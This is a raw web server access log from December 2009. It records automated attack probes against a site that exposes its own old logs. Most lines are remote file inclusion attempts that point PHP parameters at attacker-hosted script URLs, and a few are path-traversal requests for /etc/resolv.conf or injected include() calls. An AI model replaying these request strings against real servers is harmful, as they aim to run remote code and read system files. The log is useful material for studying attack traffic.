121.125.67.213 - - [16/Dec/2009:02:19:42 -0600] "GET /logs//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:02:19:42 -0600] "GET /logs/access_log.1251676800//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 366 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:02:19:54 -0600] "GET /logs//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:02:19:54 -0600] "GET //modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:02:19:54 -0600] "GET /logs/access_log.1251504000//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 366 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:02:19:54 -0600] "GET /logs/access_log.1251676800//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 366 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:02:19:57 -0600] "GET //modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:02:19:57 -0600] "GET /logs//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:02:19:57 -0600] "GET /logs/access_log.1251504000//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 366 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:02:20:02 -0600] "GET /logs//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:02:20:02 -0600] "GET //modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:02:20:02 -0600] "GET /logs/access_log.1251504000//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 366 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:02:20:04 -0600] "GET //modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:02:20:04 -0600] "GET /logs//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:02:20:04 -0600] "GET /logs/access_log.1251504000//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 366 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:02:20:05 -0600] "GET /logs/access_log.1251676800//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 366 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:02:20:07 -0600] "GET /logs/access_log.1251676800//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 366 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:02:20:08 -0600] "GET //modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:02:20:08 -0600] "GET /logs/access_log.1251504000//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 366 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:02:20:08 -0600] "GET /logs//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:02:20:09 -0600] "GET /logs/access_log.1251676800//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 366 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:02:20:13 -0600] "GET /logs/access_log.1251676800//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 366 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:02:20:15 -0600] "GET /logs//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:02:20:15 -0600] "GET /logs/access_log.1251504000//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 366 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:02:20:15 -0600] "GET /logs/access_log.1251676800//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 366 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:02:20:15 -0600] "GET //modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
64.40.103.14 - - [16/Dec/2009:02:22:09 -0600] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://netafreelancer.com/Script-Directory/templates/hbb.txt?&mode=id HTTP/1.1" 404 323 "-""-"
66.249.71.83 - - [16/Dec/2009:02:22:31 -0600] "GET /target_borg.jpg HTTP/1.1" 304 - "-""Googlebot-Image/1.0"
216.145.174.46 - - [16/Dec/2009:02:23:20 -0600] "GET /logs/access_log.1239926400 HTTP/1.1" 200 343919 "-"".NET Framework/2.0"
174.37.165.86 - - [16/Dec/2009:02:24:44 -0600] "GET /logs/access_log.1236211200//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://esboxvps.com/unix1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
174.37.165.86 - - [16/Dec/2009:02:24:44 -0600] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://esboxvps.com/unix1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
174.37.165.86 - - [16/Dec/2009:02:24:44 -0600] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://esboxvps.com/unix1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
174.37.165.86 - - [16/Dec/2009:02:24:44 -0600] "GET /logs/access_log.1230854400//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://esboxvps.com/unix1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
174.37.165.86 - - [16/Dec/2009:02:26:52 -0600] "GET /logs/access_log.1229990400%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://esboxvps.com/unix1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
174.37.165.86 - - [16/Dec/2009:02:26:52 -0600] "GET /logs/access_log.1235001600%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://esboxvps.com/unix1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
174.37.165.86 - - [16/Dec/2009:02:27:03 -0600] "GET /logs/access_log.1229472000//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://esboxvps.com/unix1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
201.24.212.133 - - [16/Dec/2009:02:29:56 -0600] "GET /http://67.18.114.154/icons/.ajim/ajimbu? HTTP/1.1" 404 322 "-""libwww-perl/5.813"
65.55.37.203 - - [16/Dec/2009:02:31:37 -0600] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.37.203 - - [16/Dec/2009:02:32:25 -0600] "GET /logs/access_log.1182038400 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
202.218.49.112 - - [16/Dec/2009:02:33:31 -0600] "GET /logs/access_log.1256083200//page.php?doc=http://www.dwno.or.kr/bbs/outlogin_skin/default/images/id1.txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
202.218.49.112 - - [16/Dec/2009:02:33:31 -0600] "GET /logs/access_log.1254096000//page.php?doc=http://www.dwno.or.kr/bbs/outlogin_skin/default/images/id1.txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
202.218.49.112 - - [16/Dec/2009:02:33:31 -0600] "GET //page.php?doc=http://www.dwno.or.kr/bbs/outlogin_skin/default/images/id1.txt? HTTP/1.1" 404 292 "-""Mozilla/5.0"
202.218.49.112 - - [16/Dec/2009:02:33:31 -0600] "GET /logs//page.php?doc=http://www.dwno.or.kr/bbs/outlogin_skin/default/images/id1.txt? HTTP/1.1" 404 297 "-""Mozilla/5.0"
195.22.14.131 - - [16/Dec/2009:02:35:05 -0600] "GET /logs//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://195.22.14.131/teste/gorum/lang/albania????????????????????????????????????????????????????????????????????????????????????????????????~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~?&mode=id HTTP/1.1" 404 302 "-""-"
195.22.14.131 - - [16/Dec/2009:02:35:06 -0600] "GET //viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://195.22.14.131/teste/gorum/lang/albania????????????????????????????????????????????????????????????????????????????????????????????????~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~?&mode=id HTTP/1.1" 404 297 "-""-"
201.24.212.133 - - [16/Dec/2009:02:38:04 -0600] "GET /logs/access_log.1235001600/http://67.18.114.154/icons/.ajim/ajimbu? HTTP/1.1" 404 349 "-""libwww-perl/5.813"
201.24.212.133 - - [16/Dec/2009:02:38:04 -0600] "GET /http://67.18.114.154/icons/.ajim/ajimbu? HTTP/1.1" 404 322 "-""libwww-perl/5.813"
201.24.212.133 - - [16/Dec/2009:02:38:05 -0600] "GET /logs/http://67.18.114.154/icons/.ajim/ajimbu? HTTP/1.1" 404 327 "-""libwww-perl/5.813"
201.24.212.133 - - [16/Dec/2009:02:38:07 -0600] "GET /logs/access_log.1229990400/http://67.18.114.154/icons/.ajim/ajimbu? HTTP/1.1" 404 349 "-""libwww-perl/5.813"
202.157.142.138 - - [16/Dec/2009:02:41:20 -0600] "GET /logs/access_log.1235433600//includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://nuthome.net//kirc/connection/noting/id1.txt? HTTP/1.1" 404 342 "-""Mozilla/5.0"
202.157.142.138 - - [16/Dec/2009:02:43:52 -0600] "GET /logs/access_log.1240272000//includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://nuthome.net//kirc/connection/noting/id1.txt? HTTP/1.1" 404 342 "-""Mozilla/5.0"
65.55.106.136 - - [16/Dec/2009:02:44:07 -0600] "GET /logs/access_log.1228176000 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.106.210 - - [16/Dec/2009:02:48:08 -0600] "GET /logs/access_log.1132444800 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
202.218.49.112 - - [16/Dec/2009:02:48:10 -0600] "GET /logs/access_log.1256860800//index.php?incl=http://www.dwno.or.kr/bbs/outlogin_skin/default/images/id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
202.218.49.112 - - [16/Dec/2009:02:48:10 -0600] "GET //index.php?incl=http://www.dwno.or.kr/bbs/outlogin_skin/default/images/id1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
202.218.49.112 - - [16/Dec/2009:02:48:10 -0600] "GET /logs//index.php?incl=http://www.dwno.or.kr/bbs/outlogin_skin/default/images/id1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
202.218.49.112 - - [16/Dec/2009:02:48:21 -0600] "GET /logs/access_log.1255046400//index.php?incl=http://www.dwno.or.kr/bbs/outlogin_skin/default/images/id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
74.53.183.210 - - [16/Dec/2009:02:48:56 -0600] "GET /logs/index.php?show=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 297 "-""-"
74.53.183.210 - - [16/Dec/2009:02:48:56 -0600] "GET /index.php?show=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 292 "-""-"
74.53.183.210 - - [16/Dec/2009:02:48:56 -0600] "GET /logs/index.php?show=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 297 "-""-"
74.53.183.210 - - [16/Dec/2009:02:48:56 -0600] "GET /index.php?show=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 292 "-""-"
200.93.147.154 - - [16/Dec/2009:02:51:58 -0600] "GET /logs/access_log.1253664000//?_SERVER[DOCUMENT_ROOT]=http://www.wowket.co.kr/wowshop/sr1113//a.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
200.93.147.154 - - [16/Dec/2009:02:52:12 -0600] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.wowket.co.kr/wowshop/sr1113//a.txt? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
200.93.147.154 - - [16/Dec/2009:02:52:13 -0600] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.wowket.co.kr/wowshop/sr1113//a.txt? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
200.93.147.154 - - [16/Dec/2009:02:52:18 -0600] "GET /logs/access_log.1253664000//?_SERVER[DOCUMENT_ROOT]=http://www.wowket.co.kr/wowshop/sr1113//a.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
200.93.147.154 - - [16/Dec/2009:02:52:35 -0600] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.wowket.co.kr/wowshop/sr1113//a.txt? HTTP/1.1" 200 65375 "-""Mozilla/5.0"
200.93.147.154 - - [16/Dec/2009:02:52:38 -0600] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.wowket.co.kr/wowshop/sr1113//a.txt? HTTP/1.1" 200 216796 "-""Mozilla/5.0"
78.110.50.121 - - [16/Dec/2009:02:53:37 -0600] "GET /logs//pollphp/db//booth.php?include_path=http://www.reducereuserecycle.com.au/modules/id1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
78.110.50.121 - - [16/Dec/2009:02:53:37 -0600] "GET /logs/access_log.1247788800//pollphp/db//booth.php?include_path=http://www.reducereuserecycle.com.au/modules/id1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
78.110.50.121 - - [16/Dec/2009:02:53:37 -0600] "GET //pollphp/db//booth.php?include_path=http://www.reducereuserecycle.com.au/modules/id1.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
78.110.50.121 - - [16/Dec/2009:02:53:37 -0600] "GET /logs/access_log.1249430400//pollphp/db//booth.php?include_path=http://www.reducereuserecycle.com.au/modules/id1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
78.110.50.121 - - [16/Dec/2009:02:53:45 -0600] "GET //pollphp/db//booth.php?include_path=http://www.reducereuserecycle.com.au/modules/id1.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
78.110.50.121 - - [16/Dec/2009:02:53:45 -0600] "GET /logs//pollphp/db//booth.php?include_path=http://www.reducereuserecycle.com.au/modules/id1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
78.110.50.121 - - [16/Dec/2009:02:53:45 -0600] "GET /logs/access_log.1238371200//pollphp/db//booth.php?include_path=http://www.reducereuserecycle.com.au/modules/id1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
78.110.50.121 - - [16/Dec/2009:02:53:45 -0600] "GET /logs//pollphp/db//booth.php?include_path=http://www.reducereuserecycle.com.au/modules/id1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
78.110.50.121 - - [16/Dec/2009:02:53:45 -0600] "GET //pollphp/db//booth.php?include_path=http://www.reducereuserecycle.com.au/modules/id1.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
78.110.50.121 - - [16/Dec/2009:02:53:45 -0600] "GET /logs/access_log.1230163200%20%20//pollphp/db//booth.php?include_path=http://www.reducereuserecycle.com.au/modules/id1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
78.110.50.121 - - [16/Dec/2009:02:53:47 -0600] "GET //pollphp/db//booth.php?include_path=http://www.reducereuserecycle.com.au/modules/id1.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
78.110.50.121 - - [16/Dec/2009:02:53:47 -0600] "GET /logs//pollphp/db//booth.php?include_path=http://www.reducereuserecycle.com.au/modules/id1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
78.110.50.121 - - [16/Dec/2009:02:53:47 -0600] "GET /logs/access_log.1230163200//pollphp/db//booth.php?include_path=http://www.reducereuserecycle.com.au/modules/id1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
78.110.50.121 - - [16/Dec/2009:02:53:54 -0600] "GET //pollphp/db//booth.php?include_path=http://www.reducereuserecycle.com.au/modules/id1.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
78.110.50.121 - - [16/Dec/2009:02:53:54 -0600] "GET /logs//pollphp/db//booth.php?include_path=http://www.reducereuserecycle.com.au/modules/id1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
78.110.50.121 - - [16/Dec/2009:02:53:54 -0600] "GET /logs/access_log.1230163200//pollphp/db//booth.php?include_path=http://www.reducereuserecycle.com.au/modules/id1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
78.110.50.121 - - [16/Dec/2009:02:54:08 -0600] "GET /logs/access_log.1236384000//pollphp/db//booth.php?include_path=http://www.reducereuserecycle.com.au/modules/id1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
94.23.238.27 - - [16/Dec/2009:02:59:15 -0600] "GET /robots.txt HTTP/1.0" 404 281 "http://majestic12.co.uk/bot.php?I=ED66495269-A43A9EC275D3350C-fortpit_pconline_com""Mozilla/5.0 (compatible; MJ12bot/v1.3.2; http://www.majestic12.co.uk/bot.php?+)"
94.23.238.27 - - [16/Dec/2009:02:59:19 -0600] "GET /logs/access_log.1252195200 HTTP/1.0" 200 229376 "http://www.arabgo.com/index/click?url=http://fortpit.pconline.com/logs/access_log.1252195200&query_id=14658&lang=""Mozilla/5.0 (compatible; MJ12bot/v1.3.2; http://www.majestic12.co.uk/bot.php?+)"
200.93.147.154 - - [16/Dec/2009:03:00:54 -0600] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.wowket.co.kr/wowshop/sr1113//a.txt? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
200.93.147.154 - - [16/Dec/2009:03:00:54 -0600] "GET /logs/access_log.1253664000//?_SERVER[DOCUMENT_ROOT]=http://www.wowket.co.kr/wowshop/sr1113//a.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
200.93.147.154 - - [16/Dec/2009:03:01:06 -0600] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.wowket.co.kr/wowshop/sr1113//a.txt? HTTP/1.1" 200 77669 "-""Mozilla/5.0"
75.101.190.209 - - [16/Dec/2009:03:01:14 -0600] "GET /robots.txt HTTP/1.1" 404 293 "-""OmniExplorer_Bot/6.10.30 (+http://www.omni-explorer.com) WorldIndexer"
75.101.190.209 - - [16/Dec/2009:03:01:57 -0600] "GET /logs/access_log.1234742400 HTTP/1.1" 200 167874 "-""OmniExplorer_Bot/6.10.30 (+http://www.omni-explorer.com) WorldIndexer"
200.93.147.154 - - [16/Dec/2009:03:03:00 -0600] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.fileden.com/files/2009/12/15/2690579/id1.txt? HTTP/1.1" 200 36689 "-""Mozilla/5.0"
200.93.147.154 - - [16/Dec/2009:03:03:01 -0600] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.fileden.com/files/2009/12/15/2690579/id1.txt? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
200.93.147.154 - - [16/Dec/2009:03:03:02 -0600] "GET /logs/access_log.1245024000//?_SERVER[DOCUMENT_ROOT]=http://www.fileden.com/files/2009/12/15/2690579/id1.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
200.93.147.154 - - [16/Dec/2009:03:03:06 -0600] "GET /logs/access_log.1245024000//?_SERVER[DOCUMENT_ROOT]=http://www.fileden.com/files/2009/12/15/2690579/id1.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
200.93.147.154 - - [16/Dec/2009:03:03:08 -0600] "GET /logs/access_log.1245024000//?_SERVER[DOCUMENT_ROOT]=http://www.fileden.com/files/2009/12/15/2690579/id1.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
200.93.147.154 - - [16/Dec/2009:03:03:15 -0600] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.fileden.com/files/2009/12/15/2690579/id1.txt? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
200.93.147.154 - - [16/Dec/2009:03:03:17 -0600] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.fileden.com/files/2009/12/15/2690579/id1.txt? HTTP/1.1" 200 110453 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:03:03:27 -0600] "GET /logs/enc/content.php?Home_Path=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:03:03:27 -0600] "GET /logs/access_log.1247097600/enc/content.php?Home_Path=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:03:03:27 -0600] "GET /logs/access_log.1248134400/enc/content.php?Home_Path=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:03:03:27 -0600] "GET /enc/content.php?Home_Path=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
200.93.147.154 - - [16/Dec/2009:03:03:31 -0600] "GET /logs/access_log.1245196800//?_SERVER[DOCUMENT_ROOT]=http://www.fileden.com/files/2009/12/15/2690579/id1.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
200.93.147.154 - - [16/Dec/2009:03:03:33 -0600] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.fileden.com/files/2009/12/15/2690579/id1.txt? HTTP/1.1" 200 216796 "-""Mozilla/5.0"
200.93.147.154 - - [16/Dec/2009:03:03:36 -0600] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.fileden.com/files/2009/12/15/2690579/id1.txt? HTTP/1.1" 200 216796 "-""Mozilla/5.0"
200.93.147.154 - - [16/Dec/2009:03:03:40 -0600] "GET /logs/access_log.1245196800//?_SERVER[DOCUMENT_ROOT]=http://www.fileden.com/files/2009/12/15/2690579/id1.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
200.93.147.154 - - [16/Dec/2009:03:03:40 -0600] "GET /logs/access_log.1245196800//?_SERVER[DOCUMENT_ROOT]=http://www.fileden.com/files/2009/12/15/2690579/id1.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
200.93.147.154 - - [16/Dec/2009:03:03:42 -0600] "GET /logs/access_log.1245196800//?_SERVER[DOCUMENT_ROOT]=http://www.fileden.com/files/2009/12/15/2690579/id1.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:03:03:44 -0600] "GET /enc/content.php?Home_Path=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:03:03:44 -0600] "GET /logs/enc/content.php?Home_Path=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:03:03:44 -0600] "GET /logs/access_log.1247097600/enc/content.php?Home_Path=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:03:03:44 -0600] "GET /logs/access_log.1248134400/enc/content.php?Home_Path=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:03:03:45 -0600] "GET /enc/content.php?Home_Path=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:03:03:45 -0600] "GET /logs/enc/content.php?Home_Path=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:03:03:45 -0600] "GET /logs/access_log.1248134400/enc/content.php?Home_Path=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:03:03:45 -0600] "GET /logs/access_log.1247097600/enc/content.php?Home_Path=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:03:03:45 -0600] "GET /enc/content.php?Home_Path=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:03:03:45 -0600] "GET /logs/enc/content.php?Home_Path=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:03:03:45 -0600] "GET /logs/access_log.1247097600/enc/content.php?Home_Path=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:03:03:45 -0600] "GET /logs/access_log.1248134400/enc/content.php?Home_Path=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:03:05:00 -0600] "GET /enc/content.php?Home_Path=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:03:05:00 -0600] "GET /logs/enc/content.php?Home_Path=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:03:05:00 -0600] "GET /logs/access_log.1247097600/enc/content.php?Home_Path=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:03:05:00 -0600] "GET /logs/access_log.1248134400/enc/content.php?Home_Path=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:03:05:03 -0600] "GET /enc/content.php?Home_Path=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:03:05:03 -0600] "GET /logs/enc/content.php?Home_Path=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
